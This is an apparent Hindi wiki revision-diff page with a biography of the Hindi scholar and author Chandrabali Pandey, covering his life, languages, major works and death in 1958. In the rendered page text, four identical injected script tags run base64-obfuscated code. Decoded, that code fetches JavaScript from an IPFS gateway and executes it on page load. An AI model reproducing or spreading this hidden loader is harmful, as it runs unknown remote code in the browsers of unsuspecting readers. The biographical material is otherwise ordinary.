Difference between revisions of "चन्द्रबली पाण्डेय"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
[[चित्र:Chandrabali-Pandey.jpg|thumb|250px|चन्द्रबली पाण्डेय]]
+
{{सूचना बक्सा साहित्यकार
चन्द्रबली पाण्डेय (जन्म-[[25 अप्रॅल]], [[1904]] - मृत्यु- [[24 जनवरी]], [[1958]]) [[हिन्दी भाषा]] और [[साहित्य]] के उन्नयन, संवर्धन और संरक्षण के लिए समर्पित थे। चन्द्रबली का जन्म [[उत्तर प्रदेश]] के [[आज़मगढ़ ज़िला|आज़मगढ़ ज़िले]] के एक गाँव में हुआ था। चन्द्रबली ने हिन्दी की उच्च शिक्षा [[काशी हिन्दू विश्वविद्यालय]] से प्राप्त की। आचार्य [[रामचन्द्र शुक्ल]] के आप प्रिय शिष्य थे। विश्वविद्यालय की परिधि से बाहर रहकर हिन्दी में शोध कार्य करने वालों में इनका प्रमुख स्थान है। हिन्दी के साथ [[अंग्रेज़ी]], [[उर्दू]], [[फ़ारसी भाषा|फ़ारसी]], [[अरबी भाषा|अरबी]] तथा [[प्राकृत]] भाषाओं के ज्ञाता चन्द्रबली पाण्डेय के सम्बन्ध में भाषा शास्त्री [[डॉ. सुनीति कुमार चटर्जी]] की यह उक्ति सटीक है कि, '''पाण्डेय जी के एक-एक पैंफलेट भी डॉक्टरेट के लिए पर्याप्त हैं।''' आजीवन अविवाहित रहकर चन्द्रबली ने हिन्दी की सेवा की थी। अपनी व्यक्तिगत सुख-सुविधा के लिए चन्द्रबली ने कभी चेष्टा नहीं की थी। चन्द्रबली के द्वारा रचित छोटे-बड़े कुल ग्रन्थों की संख्या लगभग 34 है।  
+
|चित्र=Chandrabali-Pandey.jpg
 +
|चित्र का नाम=चन्द्रबली पाण्डेय
 +
|पूरा नाम=चन्द्रबली पाण्डेय
 +
|अन्य नाम=
 +
|जन्म=-[[25 अप्रॅल]], [[1904]]
 +
|जन्म भूमि=[[आज़मगढ़ ज़िला]], [[उत्तर प्रदेश]] 
 +
|मृत्यु=[[24 जनवरी]], [[1958]]
 +
|मृत्यु स्थान=
 +
|अविभावक=
 +
|पालक माता-पिता=
 +
|पति/पत्नी=आजीवन अविवाहित
 +
|संतान=
 +
|कर्म भूमि=
 +
|कर्म-क्षेत्र=
 +
|मुख्य रचनाएँ=उर्दू का रहस्य, भाषा का प्रश्न, राष्ट्रभाषा पर विचार, हिन्दी गद्य का निर्माण आदि
 +
|विषय=
 +
|भाषा=[[हिंदी]], [[अंग्रेज़ी]], [[उर्दू]], [[फ़ारसी भाषा|फ़ारसी]]  और [[अरबी भाषा|अरबी]]  
 +
|विद्यालय=
 +
|शिक्षा=
 +
|पुरस्कार-उपाधि=
 +
|प्रसिद्धि=
 +
|विशेष योगदान=
 +
|नागरिकता=भारतीय
 +
|संबंधित लेख=
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी=चन्द्रबली पाण्डेय द्वारा रचित छोटे-बड़े कुल ग्रन्थों की संख्या लगभग 34 है।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
}}
 +
'''चन्द्रबली पाण्डेय''' ([[अंग्रेज़ी]]: ''Chandrabali Pandey'', जन्म-[[25 अप्रॅल]], [[1904]] - मृत्यु- [[24 जनवरी]], [[1958]]) [[हिन्दी भाषा]] और [[साहित्य]] के उन्नयन, संवर्धन और संरक्षण के लिए समर्पित थे।
 +
==जीवन परिचय==
 +
चन्द्रबली का जन्म [[उत्तर प्रदेश]] के [[आज़मगढ़ ज़िला|आज़मगढ़ ज़िले]] के एक गाँव में हुआ था। चन्द्रबली ने हिन्दी की उच्च शिक्षा [[काशी हिन्दू विश्वविद्यालय]] से प्राप्त की। आचार्य [[रामचन्द्र शुक्ल]] के आप प्रिय शिष्य थे। विश्वविद्यालय की परिधि से बाहर रहकर हिन्दी में शोध कार्य करने वालों में इनका प्रमुख स्थान है। हिन्दी के साथ [[अंग्रेज़ी]], [[उर्दू]], [[फ़ारसी भाषा|फ़ारसी]], [[अरबी भाषा|अरबी]] तथा [[प्राकृत]] भाषाओं के ज्ञाता चन्द्रबली पाण्डेय के सम्बन्ध में भाषा शास्त्री [[डॉ. सुनीति कुमार चटर्जी]] की यह उक्ति सटीक है कि, 'पाण्डेय जी के एक-एक पैंफलेट भी डॉक्टरेट के लिए पर्याप्त हैं।' आजीवन अविवाहित रहकर चन्द्रबली ने हिन्दी की सेवा की थी। अपनी व्यक्तिगत सुख-सुविधा के लिए चन्द्रबली ने कभी चेष्टा नहीं की थी। चन्द्रबली पाण्डेय द्वारा रचित छोटे-बड़े कुल ग्रन्थों की संख्या लगभग 34 है।  
 
==प्रमुख रचनाएँ==
 
==प्रमुख रचनाएँ==
 
पाण्डेय जी की प्रमुख रचनाएँ हैं, जो इस प्रकार है:-
 
पाण्डेय जी की प्रमुख रचनाएँ हैं, जो इस प्रकार है:-
Line 16: Line 50:
 
चन्द्रबली पाण्डेय का निधन  [[24 जनवरी]], [[1958]] ई. में हो गया था।
 
चन्द्रबली पाण्डेय का निधन  [[24 जनवरी]], [[1958]] ई. में हो गया था।
  
{{लेख प्रगति
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक2 |माध्यमिक= |पूर्णता= |शोध= }}
|आधार=
 
|प्रारम्भिक=प्रारम्भिक1
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
{{cite book | last =लीलाधर | first =शर्मा  | title =भारतीय चरित कोश  | edition = | publisher =शिक्षा भारती | location =भारतडिस्कवरी पुस्तकालय  | language =[[हिन्दी]]  | pages =265  | chapter = }}
 
{{cite book | last =लीलाधर | first =शर्मा  | title =भारतीय चरित कोश  | edition = | publisher =शिक्षा भारती | location =भारतडिस्कवरी पुस्तकालय  | language =[[हिन्दी]]  | pages =265  | chapter = }}
Line 29: Line 57:
 
{{साहित्यकार}}  
 
{{साहित्यकार}}  
 
[[Category:साहित्यकार]][[Category:आधुनिक साहित्यकार]]
 
[[Category:साहित्यकार]][[Category:आधुनिक साहित्यकार]]
[[Category:साहित्य कोश]]
+
[[Category:साहित्य कोश]][[Category:चरित कोश]]
 
[[Category:लेखक]][[Category:आधुनिक लेखक]]
 
[[Category:लेखक]][[Category:आधुनिक लेखक]]
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__

Revision as of 10:44, 20 January 2013

chandrabali pandey
poora nam chandrabali pandey
janm -25 aprॅl, 1904
janm bhoomi azamagadh zila, uttar pradesh
mrityu 24 janavari, 1958
pati/patni ajivan avivahit
mukhy rachanaean urdoo ka rahasy, bhasha ka prashn, rashtrabhasha par vichar, hindi gady ka nirman adi
bhasha hiandi, aangrezi, urdoo, farasi aur arabi
nagarikata bharatiy
any janakari chandrabali pandey dvara rachit chhote-b de kul granthoan ki sankhya lagabhag 34 hai.
inhean bhi dekhean kavi soochi, sahityakar soochi

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

chandrabali pandey (aangrezi: Chandrabali Pandey, janm-25 aprॅl, 1904 - mrityu- 24 janavari, 1958) hindi bhasha aur sahity ke unnayan, sanvardhan aur sanrakshan ke lie samarpit the.

jivan parichay

chandrabali ka janm uttar pradesh ke azamagadh zile ke ek gaanv mean hua tha. chandrabali ne hindi ki uchch shiksha kashi hindoo vishvavidyalay se prapt ki. achary ramachandr shukl ke ap priy shishy the. vishvavidyalay ki paridhi se bahar rahakar hindi mean shodh kary karane valoan mean inaka pramukh sthan hai. hindi ke sath aangrezi, urdoo, farasi, arabi tatha prakrit bhashaoan ke jnata chandrabali pandey ke sambandh mean bhasha shastri d aau. suniti kumar chatarji ki yah ukti satik hai ki, 'pandey ji ke ek-ek paianphalet bhi d aauktaret ke lie paryapt haian.' ajivan avivahit rahakar chandrabali ne hindi ki seva ki thi. apani vyaktigat sukh-suvidha ke lie chandrabali ne kabhi cheshta nahian ki thi. chandrabali pandey dvara rachit chhote-b de kul granthoan ki sankhya lagabhag 34 hai.

pramukh rachanaean

pandey ji ki pramukh rachanaean haian, jo is prakar hai:-

  • urdoo ka rahasy
  • tasavvuf athava soofimat
  • bhasha ka prashn
  • rashtrabhasha par vichar
  • kalidas
  • keshavadas
  • tulasidas
  • hindi kavi charcha
  • shoodrak
  • hindi gady ka nirman

nidhan

chandrabali pandey ka nidhan 24 janavari, 1958 ee. mean ho gaya tha.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

liladhar, sharma bharatiy charit kosh (hindi). bharatadiskavari pustakalay: shiksha bharati, 265.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>